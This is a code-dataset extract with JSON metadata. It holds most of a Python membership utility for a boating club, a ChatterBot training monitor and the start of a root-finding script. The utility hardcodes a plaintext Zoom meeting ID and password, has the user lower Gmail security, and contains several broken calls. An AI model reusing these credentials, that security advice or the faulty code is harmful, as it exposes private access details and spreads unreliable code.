cls.n_chars_wide:\n print(\"Label designations are incompatable!\")\n sys.exit()\n\n\nmedia = dict( # keep the classes in a dict\n e000=E0000,\n a5160=A5160,\n )\n\n\ndef ck_data_cmd(args=args):\n print(\"Checking for data consistency...\")\n club = Club()\n assign_default_files(club, args)\n confirm_file_present_and_up2date(club.CONTACTS_SPoT)\n output(\"\\n\".join(data.ck_data(club, fee_details=args['-d'])))\n\n\ndef show_cmd(args=args):\n club = Club()\n assign_default_files(club, args)\n club.for_web = True\n print(\"Preparing membership listings...\")\n err_code = member.traverse_records(\n club.infile,\n [member.add2lists, ],\n club)\n ret = [\"\"\"FOR MEMBER USE ONLY\n\nTHE TELEPHONE NUMBERS, ADDRESSES AND EMAIL ADDRESSES OF THE BOLINAS ROD &\nBOAT CLUB MEMBERSHIP CONTAINED HEREIN ARE NOT TO BE REPRODUCED OR DISTRIBUTED\nFOR ANY PURPOSE WITHOUT THE EXPRESS PERMISSION OF THE BOARD OF THE BRBC.\n\nData maintained by the Membership Chair and posted here by Secretary {}.\n\"\"\".format(club.SECRETARY)]\n\n if club.members:\n helpers.add_header2list(\"Club Members ({} in number as of {})\"\n .format(club.nmembers, helpers.date),\n ret, underline_char='=',\n extra_line=True)\n ret.extend(club.members)\n if club.honorary:\n helpers.add_header2list(\n \"Honorary Club Members\"\n .format(club.nhonorary, helpers.date),\n ret, underline_char='=', extra_line=True)\n ret.extend(club.honorary)\n if club.by_n_meetings:\n header = (\"Applicants ({} in number)\"\n .format(club.napplicants))\n helpers.add_header2list(header, ret, underline_char='=')\n # ####\n club.sponsors = data.get_sponsors(club.sponsor_spot)\n club.meeting_dates = data.get_meeting_dates(\n club.applicant_spot)\n ret.extend(member.show_by_status(club.by_n_meetings, club=club))\n output(\"\\n\".join(ret))\n print(\"...results sent to {}.\".format(args['-o']))\n\n\ndef names_only_cmd(args=args):\n club = Club()\n assign_default_files(club, args)\n print(\"Preparing listing of member and applicant names...\")\n err_code = member.traverse_records(club.infile,\n [member.add2names, ],club)\n ret = [\"Members and Applicants of the Bolinas Rod & Boat Club\",\n \"=====================================================\"]\n if args['-w']:\n club.names = helpers.tabulate(club.names,\n max_width=int(args['-w']),\n separator=' ')\n ret.extend(club.names)\n output('\\n'.join(ret))\n\n\n\ndef collect_stati_data(club):\n err_code = member.traverse_records(\n club.infile,\n [member.add2stati_by_m,\n member.add2demographics,\n member.add2ms_by_status,\n member.increment_napplicants,\n ],\n club)\n\n\ndef assign_applicant_files(club):\n club.applicant_spot = args['-A']\n if not club.applicant_spot:\n club.applicant_spot = Club.APPLICANT_SPoT\n club.sponsor_file = args['-S']\n if not club.sponsor_file:\n club.sponsor_file = Club.SPONSORS_SPoT\n\n\ndef setup4stati(club):\n club.infile = args[\"-i\"]\n if not club.infile:\n club.infile = Club.MEMBERSHIP_SPoT\n assign_applicant_files(club)\n if not hasattr(club, \"include_addresses\"):\n club.include_addresses = args['-D']\n if not hasattr(club, \"include_dates\"):\n club.include_dates = args['-M']\n if not hasattr(club, \"include_sponsors\"):\n club.include_sponsors = args['-B']\n if not hasattr(club, \"which2show\"):\n whch2show = args['--mode'] # signals stati to show\n if whch2show:\n if 'applic' in whch2show:\n club.stati2show = set(member.APPLICANT_STATI)\n else:\n club.stati2show = set(whch2show.split(member.SEPARATOR))\n else:\n club.stati2show = set(member.STATI)\n if not club.stati2show.issubset(member.STATI):\n print('Invalid <--mode> parameter provided.')\n sys.exit()\n if club.include_sponsors:\n club.sponsors = data.get_sponsors(club.sponsor_file)\n if club.include_dates:\n club.meeting_dates = data.get_meeting_dates(\n club.applicant_spot)\n\n\ndef show_stati(club):\n \"\"\"\n Returns a list of strings (that can be '\\n'.join(ed))\n Assumes existance of following club attributes:\n ms_by_status\n +/- stati2show\n +/- napplicants\n +/- demographics\n +/- meeting_dates\n +/- sponsors\n +/- special_notices_by_m\n See client: stati_cmd() (+/- show_cmd and others?)\n \"\"\"\n print(\"Using show_stati function (in utils.py)\")\n if not club.ms_by_status:\n return [\"Found No Entries with 'Status' Content.\"]\n ret = []\n applicant_header_written = False\n if hasattr(club, 'stati2show'):\n stati2show = sorted(club.stati2show & club.ms_by_status.keys())\n else:\n stati2show = sorted(club.ms_by_status.keys())\n if hasattr(club, 'special_notices_by_m'):\n special_notice_members = set(club.special_notices_by_m.keys())\n else:\n special_notice_members = None\n for status in stati2show:\n if hasattr(club, 'napplicants'):\n applicant_header = (\"Applicants ({} in number)\"\n .format(club.napplicants))\n else:\n applicant_header = \"Applicants\"\n if status.startswith('a'):\n if not applicant_header_written:\n helpers.add_header2list(\n applicant_header,\n ret, underline_char='=')\n applicant_header_written = True\n helpers.add_header2list(member.STATUS_KEY_VALUES[status],\n ret, underline_char='-')\n for applicant in sorted(club.ms_by_status[status]):\n if (hasattr(club, 'demographics')\n and club.include_addresses):\n ret.append(club.demographics[applicant])\n else:\n ret.append(applicant)\n if hasattr(club, 'meeting_dates'):\n if club.meeting_dates[applicant]:\n ret.append('\\tDates(s) attended: {}'.\n format(club.meeting_dates[applicant]))\n # else:\n # ret.append('\\tNo meetings yet.')\n if hasattr(club, 'sponsors'):\n ret.append('\\tSponsors: {}'.\n format(club.sponsors[applicant]))\n else:\n helpers.add_header2list(member.STATUS_KEY_VALUES[status],\n ret, underline_char='=')\n for status_holder in sorted(club.ms_by_status[status]):\n if hasattr(club, 'demographics'):\n ret.append(club.demographics[status_holder])\n# line = (club.demographics[status_holder])\n# if (special_notice_members and\n# status_holder in special_notice_members\n# ):\n# line = ('{} {}'.format(\n# line,\n# club.special_notices_by_m[status_holder]))\n# ret.append(line)\n else:\n ret.append(status_holder)\n return ret\n\n\ndef report_cmd(args=args):\n club = Club()\n assign_default_files(club, args=args)\n club.for_web = False\n print(\"Preparing Membership Report ...\")\n err_code = member.traverse_records(\n club.infile,\n [member.add2lists,\n member.add2ms_by_status,\n ],\n club)\n report = []\n helpers.add_header2list(\"Membership Report (prepared {})\"\n .format(helpers.date),\n report, underline_char='=')\n report.append('')\n report.append('Club membership currently stands at {}.'\n .format(club.nmembers))\n\n if club.by_n_meetings:\n header = (\"Applicants ({} in number, \"\n .format(club.napplicants) +\n \"with meeting dates & sponsors listed)\")\n helpers.add_header2list(header, report, underline_char='=')\n # ####\n club.sponsors = data.get_sponsors(club.sponsor_spot)\n club.meeting_dates = data.get_meeting_dates(\n club.applicant_spot)\n report.extend(member.show_by_status(club.by_n_meetings, club=club))\n if 'r' in club.ms_by_status:\n header = ('Members ({} in number) retiring from the Club:'\n .format(len(club.ms_by_status['r'])))\n report.append('')\n helpers.add_header2list(header, report, underline_char='=')\n for name in club.ms_by_status['r']:\n report.append(name)\n\n misc_stati = member.show_by_status(\n club.ms_by_status, stati2show=\"m|w|be|ba\".split('|'))\n if misc_stati:\n header = \"Miscelaneous Info\"\n helpers.add_header2list(header, report, underline_char='=')\n report.extend(misc_stati)\n redact = '''\n club_ = club_setup4extra_charges()\n club_.presentation_format = 'listings'\n report.append(\"\"\"\n\n\nFor Docks and Yard Committee\n============================\n\nI continue to include the following listing of extra fees\nbeing charged to serve as a reminder to let me know if any\nchanges are to be made before charges are applied for the\nnext (July 1, 2021-June 30, 2022) membership year.\n\n\"\"\")\n report.extend(data.extra_charges(club_, raw=True))\n '''\n\n try:\n with open(glbs.DEFAULT_ADDENDUM2REPORT_FILE, 'r') as fobj:\n print('Opening file: {}'.format(fobj.name))\n addendum = fobj.read()\n report.append(addendum)\n except FileNotFoundError:\n print('report.addendum not found')\n report.extend(\n ['', '',\n \"Respectfully submitted by...\\n\\n\",\n \"Alex Kleider, Membership Chair,\",\n \"for presentation {}.\"\n .format(helpers.next_first_friday(exclude=True)),\n ])\n report.extend(\n ['',\n 'PS Zoom ID: 527 109 8273; Password: 999620',\n ])\n output(\"\\n\".join(report))\n print(\"...results sent to {}.\".format(args['-o']))\n\n\ndef stati_cmd(args=args):\n club = Club()\n collect_stati_data(club)\n setup4stati(club)\n print(\"Preparing 'Stati' Report ...\")\n output('\\n'.join(show_stati(club)))\n\n\ndef zeros_cmd(args=args):\n \"\"\"\n Reports those with zero vs NIL in fees field.\n \"\"\"\n infile = args['-i']\n if not infile:\n infile = Club.MEMBERSHIP_SPoT\n club = Club()\n err_code = member.traverse_records(\n infile, [member.get_zeros_and_nulls, ], club)\n res = [\"Nulls:\",\n \"======\", ]\n res.extend(club.nulls)\n res.extend([\"\\nZeros:\",\n \"======\", ])\n res.extend(club.zeros)\n output('\\n'.join(res))\n\n\ndef usps_cmd(args=args):\n \"\"\"\n Generates a cvs file used by the Secretary to send out minutes.\n first,last,address,town,state,postal_code\n (Members who are NOT in the 'email only' category.)\n \"\"\"\n infile = args['-i']\n if not infile:\n infile = Club.MEMBERSHIP_SPoT\n club = Club()\n club.usps_only = []\n err_code = member.traverse_records(infile, [\n member.get_usps,\n member.get_secretary,\n member.get_bad_emails,\n ], club)\n print(\"There are {} members without an email address.\"\n .format(len(club.usps_only)))\n res = []\n header = []\n for key in club.fieldnames:\n header.append(key)\n if key == \"postal_code\":\n break\n res.append(\",\".join(header))\n res.extend(club.usps_only)\n # The following 2 lines are commented out because new secretary\n # Michael Rafferty doesn't need/want to be on the list.\n# if hasattr(club, 'secretary'):\n# res.append(club.secretary)\n if club.bad_emails:\n print(\"... and {} more with a non functioning email.\"\n .format(len(club.bad_emails)))\n res.extend(club.bad_emails)\n return '\\n'.join(res)\n\n\ndef club_setup4extra_charges(args=args):\n \"\"\"\n Returns an instance of rbc.Club set up with what's needed\n to run the data.extra.charges function.\n \"\"\"\n club = Club\n club.infile = args[\"-i\"]\n if not club.infile:\n club.infile = club.EXTRA_FEES_SPoT\n club.json_file = args['-j']\n try:\n club.max_width = int(args['-w'])\n except TypeError:\n print(\"'-w' option must be an integer\")\n sys.exit()\n club.presentation_format = args['-f']\n club.bad_format_warning = \"\"\"Bad argument for '-f' option...\nChoose one of the following: [default: table]\n 'table' listing of names /w fees tabulated (=> 2 columns.)\n 'listing' same format as Data/extra_fees.txt\n 'listings' side by side lists (best use landscape mode.) \"\"\"\n return club\n\n\n\ndef extra_charges_cmd(args=args):\n \"\"\"\n Returns a report of members with extra charges.\n It also can create a json file: specified by the -j option.\n \"\"\"\n output('\\n'.join(data.extra_charges(club_setup4extra_charges())))\n\n\ndef payables_cmd(args=args):\n \"\"\"\n Sets up club attributes still_owing and advance_payments (both\n of which are lists) and then calls member.get_payables which\n traverses the db populating them.\n \"\"\"\n infile = args['-i']\n if not infile:\n infile = Club.MEMBERSHIP_SPoT\n club = Club()\n club.still_owing = []\n club.advance_payments = []\n output = []\n err_code = member.traverse_records(infile,\n member.get_payables,\n club)\n if club.still_owing:\n helpers.add_header2list(\n \"Members owing ({} in number)\"\n .format(len(club.still_owing)),\n output, underline_char='=', extra_line=True)\n if args['-T']:\n tabulated = helpers.tabulate(club.still_owing,\n max_width=max_width,\n separator=' ')\n output.extend(tabulated)\n else:\n output.extend(club.still_owing)\n if club.advance_payments:\n output.append(\"\\n\")\n output.extend([\"Members with a Credit\",\n \"---------------------\"])\n output.extend(club.advance_payments)\n return '\\n'.join(output)\n\n\ndef show_mailing_categories_cmd(args=args):\n \"\"\"\n Needs to be rewritten to take advantage of the -T and -w \n options.\n \"\"\"\n ret = [\"Possible choices for the '--which' option are: \", ]\n ret.extend(\n helpers.tabulate(\n [key for key in content.content_types.keys()],\n separator=' '))\n# ret.extend(((\"\\t\" + key) for key in content.content_types.keys()))\n output('\\n'.join(ret))\n\n\ndef prepare4mailing(club):\n \"\"\"\n Set up configuration in an instance of rbc.Club.\n \"\"\"\n club.owing_only = False\n if args['--oo']:\n club.owing_only = True\n if not args['--which']:\n club.which = content.content_types[\"thank\"]\n else:\n club.which = content.content_types[args[\"--which\"]]\n club.lpr = content.printers[args[\"-p\"]]\n club.email = content.prepare_email_template(club.which)\n club.letter = content.prepare_letter_template(club.which,\n club.lpr)\n if not args[\"-i\"]:\n args[\"-i\"] = club.MEMBERSHIP_SPoT\n club.input_file_name = args['-i']\n if not args[\"-j\"]:\n args[\"-j\"] = club.JSON_FILE_NAME4EMAILS\n club.json_file_name = args[\"-j\"]\n if not args[\"--dir\"]:\n args[\"--dir\"] = club.MAILING_DIR\n club.mail_dir = args[\"--dir\"]\n club.attachment = args['ATTACHMENTS']\n club.cc = args['--cc']\n club.bcc = args['--bcc']\n # *** Check that we don't overwright previous mailings:\n if club.which[\"e_and_or_p\"] in (\"both\", \"usps\", \"one_only\"):\n print(\"Checking for directory '{}'.\".format(args[\"--dir\"]))\n club.check_mail_dir(club.mail_dir)\n if club.which[\"e_and_or_p\"] in (\"both\", \"email\", \"one_only\"):\n print(\"Checking for file '{}'.\".format(club.json_file_name))\n club.check_json_file(club.json_file_name)\n club.json_data = []\n\n\ndef prepare_mailing_cmd(args=args):\n \"\"\"\n See description under 'Commands' heading in the docstring.\n Sets up an instance of rbc.Club with necessary attributes and\n then calls member.prepare_mailing.\n \"\"\"\n # ***** Set up configuration in an instance of # Club:\n club = Club()\n prepare4mailing(club)\n # ***** Done with configuration & checks ...\n member.prepare_mailing(club) # Populates club.mail_dir\n # and moves json_data to file.\n print(\"\"\"prepare_mailing completed..\n ..next step might be the following:\n $ zip -r 4Michael {}\"\"\".format(args[\"--dir\"]))\n\n\ndef setup4new_db(club):\n club.infile = args['-i']\n club.outfile = args['-o']\n club.extra_fees_spot = args['-X']\n# club.owing_only = args['--oo'] # Why?! Plan 2 delete.\n if not club.infile:\n club.infile = club.MEMBERSHIP_SPoT\n# print('club.outfile set to {}'.format(club.outfile))\n if club.outfile == 'stdout' or not club.outfile:\n club.outfile = helpers.prepend2file_name('new_', club.infile)\n# print('club.outfile set to {}'.format(club.outfile))\n if not club.extra_fees_spot:\n club.extra_fees_spot = club.EXTRA_FEES_SPoT\n club.fieldnames = data.get_fieldnames(club.infile)\n\n\ndef thank_cmd(args=args):\n club = Club()\n club.thank_file = args[\"-t\"]\n if not club.thank_file:\n club.thank_file = Club.THANK_FILE\n member.traverse_records(club.thank_file,\n [member.add2statement_data, ],\n club)\n # To implememnt: maintain a record of those thanked...\n club.statement_data_keys = club.statement_data.keys()\n prepare4mailing(club)\n club.input_file_name = club.thank_file\n member.prepare_mailing(club) # => thank_func,\n # Done with thanking; Must now update DB.\n setup4new_db(club)\n dict_write(club.outfile,\n club.fieldnames,\n member.modify_data(club.infile,\n member.credit_payment_func,\n club)\n )\n\n\ndef dict_write(f, fieldnames, iterable):\n \"\"\"\n Writes all records received from into a new csv\n file named . defines the record keys.\n Code writen in such a way that could be\n a generator function. (See member.modify_data.)\n \"\"\"\n with open(f, 'w') as outfile_obj:\n print(\"Opening {} for output...\".format(outfile_obj.name))\n dict_writer = csv.DictWriter(outfile_obj, fieldnames)\n dict_writer.writeheader()\n for record in iterable:\n dict_writer.writerow(record)\n\n\nredacted = '''\ndef new_db_cmd():\n \"\"\"\n One time use only:\n Eliminated 'email_only' field from data base.\n Already done so can redact this.\n \"\"\"\n if args['-F'] and args['-F'] in member.func_dict:\n func, fieldnames = member.func_dict[args['-F']]\n else:\n print(\"Not a valid function parameter.\")\n print(\"Must be one of the following:\")\n for f in member.func_dict.keys():\n print(\"\\t{}\".format(f))\n print(\"Terminating\")\n sys.exit()\n club = Club()\n setup4new_db(club)\n club.new_fieldnames = fieldnames\n dict_write(club.outfile, fieldnames,\n member.modify_data(club.infile, func, club)\n )\n'''\n\n\ndef display_emails_cmd(args=args):\n records = helpers.get_json(args['-j'], report=True)\n all_emails = []\n n_emails = 0\n for record in records:\n email = []\n for field in record:\n email.append(\"{}: {}\".format(field, record[field]))\n email.append('')\n all_emails.extend(email)\n n_emails += 1\n print(\"Processed {} emails...\".format(n_emails))\n return \"\\n\".join(all_emails)\n\n\ndef ck_lesssecureapps_setting():\n \"\"\"\n Does nothing if not using a gmail account. (--mta ending in 'g')\n If using gmail the account security setting must be lowered:\n https://myaccount.google.com/lesssecureapps\n \"\"\"\n if args['--mta'].endswith('g'):\n print( # Check lesssecureapps setting:\n 'Has \"https://myaccount.google.com/lesssecureapps\" been set')\n response = input(\n '.. and have you respoinded affirmatively to the warning? ')\n if ((not response) or not (response[0] in 'Yy')):\n print(\"Emailing won't work until that's done.\")\n sys.exit()\n\n\ndef send_emails_cmd(args=args):\n \"\"\"\n Sends emails prepared by prepare_mailing_cmd.\n See also content.authors_DOCSTRING.\n \"\"\"\n ck_lesssecureapps_setting()\n mta = args[\"--mta\"]\n emailer = args[\"--emailer\"]\n if emailer == \"python\":\n emailer = Pymail.send.send\n print(\"Using Python modules to dispatch emails.\")\n elif emailer == \"bash\":\n emailer = Bashmail.send.send\n print(\"Using Bash to dispatch emails.\")\n else:\n print('\"{}\" is an unrecognized \"--emailer\" option.'\n .format(emailer))\n sys.exit(1)\n wait = mta.endswith('g')\n message = None\n data = helpers.get_json(args['-j'], report=True)\n emailer(data, mta, include_wait=wait)\n\n\ndef print_letters_cmd(args=args):\n \"\"\"\n Depricated in favour of simply using 'lpr' cmd.\n \"\"\"\n successes = []\n failures = []\n for letter_name in os.listdir(args[\"--dir\"]):\n path_name = os.path.join(mail_dir, letter_name)\n completed = subprocess.run([\"lpr\", path_name])\n if completed.returncode:\n failures.append(\"Problem ({}) printing '{}'.\"\n .format(completed.returncode, path_name))\n else:\n successes.append(\"{}\".format(path_name))\n if successes:\n successes = (\"Following letters printed successfully:\\n\"\n + successes)\n else:\n successes = [\"No file was printed successfully.\"]\n if failures:\n failures = (\"Following letters failed to print:\\n\"\n + failures)\n else:\n failures = [\"All files printed successfully.\"]\n successes = '\\n'.join(successes)\n failures = '\\n'.join(failures)\n report = successes + args['--separator'] + failures\n output(report)\n\n\ndef emailing_cmd(args=args):\n \"\"\"\n Uses mutt (in member.send_attachment.)\n Sends emails with an attachment.\n Sets up an instance of Club and traverses\n the input file calling member.send_attachment\n on each record.\n \"\"\"\n club = Club()\n club.mutt_send = mutt_send\n if not args[\"-i\"]:\n args[\"-i\"] = club.MEMBERSHIP_SPoT\n with open(args[\"-c\"], \"r\") as content_file:\n club.content = content_file.read()\n err_code = member.traverse_records(args[\"-i\"],\n member.send_attachment,\n club=club)\n\n\ndef restore_fees_cmd(args=args):\n \"\"\"\n If records are found with balance still outstanding, these are\n reported to errors. Also reported will be anyone listed as paying\n fees but not found amongst members.\n Repopulates the club's master list with the ANNUAL_DUES constant\n and any fees being charged as specified in the file specified by\n 'args['']'.\n The -i is not changed.\n If '-o ' is specified, output goes there,\n if not, output goes to a file named by concatenating 'new_' with\n the name of the input file.\n \"\"\"\n # ## During implementation, be sure to ... ###\n # ## Take into consideration the possibility of credit values. ###\n club = Club()\n setup4new_db(club)\n data.restore_fees(club) # Populates club.new_db & club.errors\n data.save_db(club.new_db, club.outfile, club.fieldnames)\n if club.errors:\n output('\\n'.join(\n ['Note the following irregularities:',\n '==================================', ]\n + club.errors), destination=args['-e'])\n\n# if club.still_owing:\n# pass\n if club.errors and args[\"-e\"]:\n with open(args[\"-e\"], 'w') as file_obj:\n file_obj.write(club.errors)\n print('Wrote errors to \"{}\".'.format(file_obj.name))\n# if ret:\n# sys.exit(ret)\n\n\ndef fee_intake_totals_cmd(args=args):\n \"\"\"\n This command deals with the manual method of entering receipts.\n Eventually this will be deprecated in favour of the thank_cmd\n \"\"\"\n outfile = args['-o']\n errorfile = args['-e']\n club = Club()\n if args['-i']:\n fees_taken_in = club.fee_totals(infile=args['-i'])\n else:\n fees_taken_in = club.fee_totals()\n fees_taken_in.append(\" \")\n res = '\\n'.join(fees_taken_in)\n output(res)\n if club.invalid_lines and errorfile:\n print('Writing possible errors to \"{}\".'\n .format(errorfile))\n output('\\n'.join(club.invalid_lines),\n errorfile, announce_write=False)\n\n\ndef labels_cmd(args=args):\n if args[\"-P\"]:\n medium = media[args[\"-P\"]]\n else:\n medium = A5160\n club = Club(medium)\n club = args[\"-i\"]\n return club.get_labels2print(source_file)\n\n\ndef envelopes_cmd(args=args):\n if args[\"-P\"]:\n medium = media[args[\"-P\"]]\n else:\n medium = E0000\n club = Club(medium)\n source_file = args[\"-i\"]\n club.print_custom_envelopes(source_file)\n\n\ndef wip_cmd(args=args):\n \"\"\"\n Code under development (work in progress) temporarily housed here.\n \"\"\"\n applicants = data.get_applicant_data(Club.APPLICANT_SPoT,\n Club.SPONSORS_SPoT)\n for key in applicants.keys():\n if applicants[key]['dates']:\n print(\"{}: Meeting dates {}\"\n .format(key, applicants[key]['dates']))\n else:\n print(\"{}: No meetings attended to date.\"\n .format(key))\n print(\"\\tsponsors are {}\".format(applicants[key]['sponsors']))\n return\n\n\n# # Plan to redact the next two functions in favour of using\n# # the Python mailing modules instead of msmtp and mutt.\n# # For the time being the Python modules are being used\n# # when sending via Easydns.com but msmtp is still being\n# # used when gmail is the MTA.\n\n\n'''\ndef smtp_send(recipients, message):\n \"\"\"\n Send email, as defined in ,\n to the who will receive this email\n from the Bolinas Rod and Boat Club.\n must be an iterable of one or more email addresses.\n Note: Must first lower br&bc's account security at:\n https://myaccount.google.com/lesssecureapps\n Also Note: must be in proper format with\n \"From:\", \"To:\" & \"Subject:\" lines (no leading spaces!) followed\n by a blank line and then the text of the email. The \"From:\" line\n should read as follows: \"From: rodandboatclub@gmail.com\"\n \"\"\"\n cmd_args = [\"msmtp\", \"-a\", glbs.MSMTP_ACCOUNT, ]\n for recipient in recipients:\n cmd_args.append(recipient)\n p = subprocess.run(cmd_args, stdout=subprocess.PIPE,\n input=message, encoding='utf-8')\n if p.returncode:\n print(\"Error: {} ({})\".format(\n p.stdout, recipient))\n'''\n\n\ndef mutt_send(recipient, subject, body, attachments=None):\n \"\"\"\n Does the mass e-mailings with attachment(s) which, if\n provided, must be in the form of a list of files.\n \"\"\"\n cmd_args = [\"mutt\", \"-F\", args[\"-F\"], ]\n cmd_args.extend([\"-s\", \"{}\".format(subject)])\n if attachments:\n list2attach = ['-a']\n for path2attach in attachments:\n list2attach.append(path2attach)\n cmd_args.extend(list2attach)\n cmd_args.extend([\"--\", recipient])\n p = subprocess.run(cmd_args, stdout=subprocess.PIPE,\n input=body, encoding='utf-8')\n if p.returncode:\n print(\"Error: {} ({})\".format(\n p.stdout, recipient))\n\n\nif __name__ == \"__main__\":\n # print(args)\n\n if args[\"?\"]:\n doc_lines = __doc__.split('\\n')\n for n in range(len(doc_lines)):\n if doc_lines[n] == \"Usage:\":\n uline = n\n if doc_lines[n] == \"Options:\":\n oline = n\n break\n print('\\n'.join(doc_lines[uline:oline - 1]))\n elif args[\"ck_data\"]:\n ck_data_cmd()\n elif args[\"show\"]:\n show_cmd()\n elif args[\"names_only\"]:\n names_only_cmd()\n elif args[\"report\"]:\n report_cmd()\n elif args[\"stati\"]:\n stati_cmd()\n elif args[\"zeros\"]:\n zeros_cmd()\n elif args[\"usps\"]:\n print(\"Preparing a csv file listing showing members who\")\n print(\"receive meeting minutes by mail. i.e. don't have (or\")\n print(\"haven't provided) an email address (to the Club.)\")\n output(usps_cmd())\n elif args[\"extra_charges\"]:\n print(\"Selecting members with extra charges:\")\n extra_charges_cmd()\n elif args[\"payables\"]:\n print(\"Preparing listing of payables...\")\n output(payables_cmd())\n elif args['show_mailing_categories']:\n show_mailing_categories_cmd()\n elif args[\"prepare_mailing\"]:\n print(\"Preparing emails and letters...\")\n prepare_mailing_cmd()\n print(\"...finished preparing emails and letters.\")\n elif args[\"thank\"]:\n print(\"Preparing thank you emails and/or letters...\")\n thank_cmd()\n# print(\"...finished preparing thank you emails and/or letters.\")\n elif args['display_emails']:\n output(display_emails_cmd())\n elif args[\"send_emails\"]:\n print(\"Sending emails...\")\n send_emails_cmd()\n print(\"Done sending emails.\")\n elif args[\"print_letters\"]:\n print(\"Printing letters ...\")\n print_letters_cmd()\n print(\"Done printing letters.\")\n elif args['emailing']:\n emailing_cmd()\n elif args['restore_fees']:\n restore_fees_cmd()\n elif args['fee_intake_totals']:\n fee_intake_totals_cmd()\n elif args[\"labels\"]:\n print(\"Printing labels from '{}' to '{}'\"\n .format(args['-i'], args['-o']))\n output(labels_cmd())\n elif args[\"envelopes\"]:\n # destination is specified within Club\n # method print_custom_envelopes() which is called\n # by print_statement_envelopes()\n print(\"\"\"Printing envelopes...\n addresses sourced from '{}'\n with output sent to '{}'\"\"\"\n .format(args['-i'], args['-o']))\n envelopes_cmd()\n elif args[\"wip\"]:\n print(\"Work in progress command...\")\n wip_cmd()\n elif args[\"new_db\"]:\n print(\"Creating a modified data base...\")\n new_db_cmd()\n else:\n print(\"You've failed to select a command.\")\n print(\"Try ./utils.py ? # brief! or ...\")\n print(\" ./utils.py -h # for more detail or ...\")\n print(\" ./utils.py -h | pager # to catch it all.\")\n\nNOTE = \"\"\"\nemailing_cmd()\n uses Club.traverse_records(infile,\n club.send_attachment(args[\"-i\"]))\n\"\"\"\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":49047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643710196","text":"import os\nimport sys\nfrom chatterbot.trainers import ListTrainer\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\nfrom common import mymysql\nfrom common import fenci\nfrom chatterbot import ChatBot\nimport logging\nimport operator\nimport time\nsetup_logging()\nlogger = logging.getLogger(\"root\")\n\n\ndef initcbot(kbname, onlyread=False):\n try:\n cbot = ChatBot('ai_%s' % kbname,\n storage_adapter=CHATTERBOT['storage_adapter'],\n filters=['chatterbot.filters.RepetitiveResponseFilter'],\n database_uri=KGDATABASES['database_uri'],\n database='ai_%s' % kbname,\n read_only=onlyread, )\n # logger.info(self._Chatbot)\n except Exception as msg:\n logger.info('Failure to initialize Chatterbot.', exc_info=True)\n logger.error(msg)\n\n\ndef preprocess(self, sentence, companyid=None):\n if ISFENCI:\n if ISSYMS:\n return fenci.symp_sentence(sentence, companyid)\n else:\n return sentence\n else:\n return sentence\n\n\ndef trainkb(conn,kbname):\n cbot = initcbot(kbname)\n try:\n logger.info(\"start set trainer\")\n cbot._Chatbot.set_trainer(ListTrainer)\n except Exception as msg:\n logger.error(msg)\n logger.info(\"start set trainer\")\n a = 0\n param = (kbname.split(\"_\")[0])\n selectresult = mymysql.myselectqas(conn, param)\n company_id = mymysql.myselectcpid(conn, param)\n logger.debug('start training the knowdata: %s and the companyid: %s.' % (kbname, company_id[0]))\n b = len(selectresult)\n for row in selectresult:\n answer = \"%s@%s\" % (row[2], row[0])\n question = preprocess(row[1], company_id[0])\n cbot.train([question, answer])\n logger.debug('Train: %d, %s --> %s.' % (a, question, answer))\n a = a + 1\n\n if a >= b:\n logger.info('success training.')\n return True\n else:\n logger.info('failure training.')\n return False\n\n\ndef addtraintaskMonitor(conn, traindata):\n param = (traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 0)\n temp_status = mymysql.myselectstatus(conn, param)\n if operator.ne(traindata, 'Null') and temp_status[0] == 3:\n logger.debug('Watch %s need to train ' % (traindata,))\n param = (1, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 3)\n paramkg = (1, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 0)\n logger.info('untrained kb %s is ready to train in mysql' % traindata.split(\"_\")[0])\n if mymysql.myupdate(conn, param):\n logger.info('untrained kb %s in mysql turns from status 3 to 1.' % traindata.split(\"_\")[0])\n mymysql.myupdatekg(conn, paramkg)\n logger.info('knowgraphs with kb %s, version %s in mysql turns from train_state 0 to 1.' % traindata)\n if trainkb(traindata):\n param = (2, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 1)\n if mymysql.myupdate(conn, param):\n logger.info('mission kb %s in mysql turns from status 1 to 2.' % traindata.split(\"_\")[0])\n mymysql.myupdatekg(conn, param)\n logger.info('knowgraphs with kb %s, version %s in mysql turns from train_state 1 to 2.' % traindata)\n logger.info('success to train.')\n else:\n logger.info('failure to train')\n param = (0, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 1)\n if mymysql.myupdate(conn, param):\n logger.info('mission kb %s in mysql turns from status 1 to 0.' % traindata.split(\"_\")[0])\n mymysql.myupdatekg(conn, param)\n logger.info('knowgraphs with kb %s, version %s in mysql turns from train_state 1 to 0.' % traindata)\n mymysql.myclose(conn)\n\n\ndef startMonitorMySQL(conn):\n train_tasks = []\n param = (0, 0)\n selectresult = mymysql.myselect(conn, param)\n for row in selectresult:\n if str(row[1]).isdigit():\n train_tasks.append(\"%s_%s\" % (row[0], row[1]))\n logger.info('current train tasks is %s from mysql.' % train_tasks)\n return train_tasks\n\n\ndef changemissiontraining(conn, traindata):\n param = (3, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 0)\n logger.debug('untrained kb %s is ready for train' % (traindata.split(\"_\")[0],))\n return mymysql.myupdate(conn, param)\n\n\ndef mymonitorabox():\n conn = mymysql.myconnect(KBDATABASES)\n logger.info('start to tarin with main')\n datas = startMonitorMySQL(conn)\n if datas:\n for traindata in datas:\n if changemissiontraining(conn,traindata):\n addtraintaskMonitor(conn, traindata)\n time.sleep(20)\n\n\nif __name__ == '__main__':\n logger.info('start monitor for db training tasks.')\n while True:\n mymonitorabox()\n time.sleep(20)","sub_path":"trainbox/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471689658","text":"#!/usr/bin/python3\nimport sympy\nimport math\nfrom prettytable import PrettyTable\n\ndef fakeRule(xi, xs, tol, ite):\n errorRela.append(\"\")\n tXi.append(xi)\n tXs.append(xs)\n if (tol >= 0):\n if (ite > 0):\n yi = function.evalf().subs({x:xi}).evalf()\n if (yi != 0):\n ys = function.evalf().subs({x:xs}).evalf()\n if (ys != 0):\n if 